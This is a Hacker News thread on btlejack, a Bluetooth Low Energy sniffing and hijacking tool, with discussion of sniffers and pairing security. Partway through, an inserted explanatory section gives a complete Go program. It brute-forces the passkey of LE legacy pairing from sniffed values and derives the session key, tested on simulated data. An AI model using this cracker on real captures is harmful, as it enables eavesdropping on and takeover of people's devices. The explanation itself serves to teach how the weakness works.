
Bluetooth Low Energy Swiss-Army Knife - okket
https://github.com/virtualabs/btlejack
======
THE_PUN_STOPS
Using Hacker News as a mechanical engineer with not much interest in software
sometimes leads to cases where I misinterpret article titles.

I was very excited to find out how and why anybody would put BLE into a
literal multi-tool!

~~~
alasano
> Person 1: BLE in a Swiss-Army Knife.. what can you do with that?

> Person 2: Take a look.

"Your Swiss-Army Knife is now connected"

> Person 1: Nice.

> Person 2: Nice.

~~~
teekert
Imagine it connects to your phone and reports temperature, tilt, humidity, its
location, works as a compass (Why not use the phone directly? Well, maybe I
need to monitor the trailer I am trying to get level as I adjust the front
wheel?)

------
oflannabhra
I’ve only used Ubertooth [0] to sniff BLE. I was not very impressed with its
ability to follow connections (it would frequently miss the connection
exchange due to channel hopping).

Can using multiple micro:bits at once with BTLEJack increase the success rate?

Most BLE diagnostic equipment that guarantees capture of all traffic costs
over $10k.

[0] -
[https://github.com/greatscottgadgets/ubertooth](https://github.com/greatscottgadgets/ubertooth)

~~~
alex_suzuki
Same here. We've been using Ubertooth One and it was not a pleasant
experience. Certainly cheap and easy to set up, but with very mixed results.
Not only does it miss connections due to the channel hopping, it also
frequently loses connections, which is even more frustrating.

We've had the privilege to know someone with a professional wide-band solution
(Ellisys Bluetooth Explorer), and it was miles ahead, including the analysis
software.

Disclaimer: I am not in any way affiliated with Ellisys.

------
exabrial
Are BLE connections neither encrypted nor authenticated? How on Earth does the
connection hijacking work so simplistically?

~~~
Jedd
My understanding is the initial handshake is not terribly secure, and sniffers
watching that can obtain the long term key used by the pair forever.

But I gather a third party can force a handshake refresh at will, which may be
what they're doing here. Code's available. : )

~~~
dmitrygr
False, basically on every count.

This attack has zero effect on connections established using an MITM-protected
pairing method. This attack is a non-event to any device that follows proper
security design as per the BT spec.

~~~
keybuk
There are vulnerabilities in the "standard" LE pairing, even with MITM, that
make these things possible.

Fixed with the BT LE Secure Connections key exchange, but many devices don't
implement that.

~~~
dmitrygr
Please cite

~~~
larkeith
[https://www.digikey.com/eewiki/display/Wireless/A+Basic+Intr...](https://www.digikey.com/eewiki/display/Wireless/A+Basic+Introduction+to+BLE+Security)

(Heading: Pairing Methods for LE Secure Connections (4.2 devices only))

~~~
dmitrygr
That talks about 4.2 pairing methods. I'm looking for a citation claiming that
4.1 pairing method is in any way insecure
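The weakness in pre-4.2 ("LE legacy") pairing that the thread above argues about is concrete enough to show in code. In legacy pairing the Temporary Key (TK) is either zero (Just Works) or a six-digit passkey, and each side sends a confirm value c1(TK, rand, ...) over the air before its random; a passive sniffer therefore needs only one (Mconfirm, Mrand) pair plus the pairing PDUs and addresses to brute-force TK over at most 1,000,000 candidates, then derives the same STK = s1(TK, Srand, Mrand) that the devices use to encrypt the link and distribute the LTK. Passkey Entry counts as an MITM-protected method in the spec, which is why "MITM-protected" alone does not help here; LE Secure Connections replaces this with an ECDH exchange and is not affected. The program below is an added example, not code from the thread or from btlejack: it implements c1 and s1 from Bluetooth Core Spec 4.2 Vol 3 Part H sections 2.2.3 and 2.2.4, simulates one passkey pairing with constructed PDUs, addresses and nonces, and recovers the passkey and STK from the attacker's view. The block layout is most-significant-byte first, as in the spec's formulas; bytes taken from a real air capture are little-endian and would need reversing first.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

// PairingParams holds what a passive sniffer sees during LE legacy pairing
// (Core Spec 4.2, Vol 3 Part H, 2.2.3): the two pairing PDUs and addresses.
type PairingParams struct {
	Preq, Pres [7]byte // Pairing Request / Pairing Response PDUs
	Iat, Rat   byte    // initiating / responding address type: 0 public, 1 random
	Ia, Ra     [6]byte // initiating / responding device addresses
}

// e is the spec's security function: one AES-128 block encryption.
func e(key, plain [16]byte) [16]byte {
	c, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err) // a 16-byte key cannot fail
	}
	var out [16]byte
	c.Encrypt(out[:], plain[:])
	return out
}

func xor16(a, b [16]byte) [16]byte {
	for i := range a {
		a[i] ^= b[i]
	}
	return a
}

// c1 is the confirm value: e(k, e(k, r XOR p1) XOR p2) with
// p1 = pres || preq || rat' || iat' and p2 = padding || ia || ra.
func c1(k, r [16]byte, p PairingParams) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], p.Pres[:])
	copy(p1[7:14], p.Preq[:])
	p1[14], p1[15] = p.Rat, p.Iat
	copy(p2[4:10], p.Ia[:])
	copy(p2[10:16], p.Ra[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 is the key generation function: STK = s1(TK, Srand, Mrand), built from
// the least significant 64 bits of each random.
func s1(k, r1, r2 [16]byte) [16]byte {
	var r [16]byte
	copy(r[0:8], r1[8:])
	copy(r[8:16], r2[8:])
	return e(k, r)
}

// tkFromPasskey places the 6-digit passkey in the low bits of a zero TK.
// Just Works pairing is the degenerate case passkey == 0.
func tkFromPasskey(passkey uint32) [16]byte {
	var tk [16]byte
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// CrackTK recovers the passkey from one sniffed (Mconfirm, Mrand) pair by
// trying every candidate: two AES block operations each, seconds at worst.
func CrackTK(mconfirm, mrand [16]byte, p PairingParams) (uint32, bool) {
	for pk := uint32(0); pk < 1000000; pk++ {
		if c1(tkFromPasskey(pk), mrand, p) == mconfirm {
			return pk, true
		}
	}
	return 0, false
}

// Exchange is the attacker's view of one pairing: parameters, master confirm
// and random, slave random. Sconfirm is not needed for the attack.
type Exchange struct {
	Params          PairingParams
	Mconfirm, Mrand [16]byte
	Srand           [16]byte
}

// SimulatePairing runs the legitimate Passkey Entry exchange with the given
// passkey and returns what went over the air plus the STK both devices derived.
// All PDU fields, addresses and "random" nonces are constructed constants.
func SimulatePairing(passkey uint32) (Exchange, [16]byte) {
	p := PairingParams{
		// opcode, IO capability, OOB flag, AuthReq (bonding|MITM), max key size,
		// initiator key distribution, responder key distribution
		Preq: [7]byte{0x01, 0x04, 0x00, 0x05, 0x10, 0x07, 0x07}, // KeyboardDisplay
		Pres: [7]byte{0x02, 0x00, 0x00, 0x05, 0x10, 0x07, 0x07}, // DisplayOnly
		Iat:  1, Rat: 0,
		Ia: [6]byte{0xc0, 0x11, 0x22, 0x33, 0x44, 0x55},
		Ra: [6]byte{0x00, 0x1b, 0xdc, 0x0a, 0x0b, 0x0c},
	}
	tk := tkFromPasskey(passkey)
	var mrand, srand [16]byte
	for i := range mrand {
		mrand[i], srand[i] = byte(0x10+i), byte(0xa0+i)
	}
	ex := Exchange{Params: p, Mconfirm: c1(tk, mrand, p), Mrand: mrand, Srand: srand}
	return ex, s1(tk, srand, mrand)
}

// RecoverSTK is the attacker side: crack TK, then derive the link STK.
func RecoverSTK(ex Exchange) ([16]byte, uint32, bool) {
	pk, ok := CrackTK(ex.Mconfirm, ex.Mrand, ex.Params)
	if !ok {
		return [16]byte{}, 0, false
	}
	return s1(tkFromPasskey(pk), ex.Srand, ex.Mrand), pk, true
}

func main() {
	ex, stk := SimulatePairing(31337)
	got, pk, ok := RecoverSTK(ex)
	fmt.Printf("cracked=%v passkey=%06d stk_matches=%v\n", ok, pk, got == stk)
}
```

With the STK in hand a sniffer can decrypt the encrypted session that follows and read the LTK when it is distributed, which is the "obtain the long term key used by the pair forever" outcome mentioned earlier in the thread; the same calculation with a zero TK covers Just Works. LE Secure Connections pairing (4.2 and later) does not transmit anything that lets TK or the LTK be derived from a passive capture, so this brute force does not apply to it.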

------
jaimex2
Would this work on Tesla Model 3's phone key system?

[https://www.tesla.com/support/model-3#phone-key](https://www.tesla.com/support/model-3#phone-key)

------
jerkstate
Cool! I have been using a Nordic BLE sniffer for reverse engineering fitness
bands, which is awful because it's only half duplex. Can't wait to try this
out.

